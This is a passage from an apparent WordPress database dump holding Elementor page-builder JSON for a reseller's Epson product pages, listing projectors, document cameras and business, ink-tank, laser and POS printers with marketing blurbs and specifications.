]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7937,3477,'_elementor_version','2.5.14'),(8665,1481,'_elementor_css','a:5:{s:4:\"time\";i:1571990039;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(7940,3478,'_wp_page_template','template-fullwidth.php'),(7941,3478,'_elementor_edit_mode','builder'),(7942,3478,'_elementor_template_type','post'),(7943,3478,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" 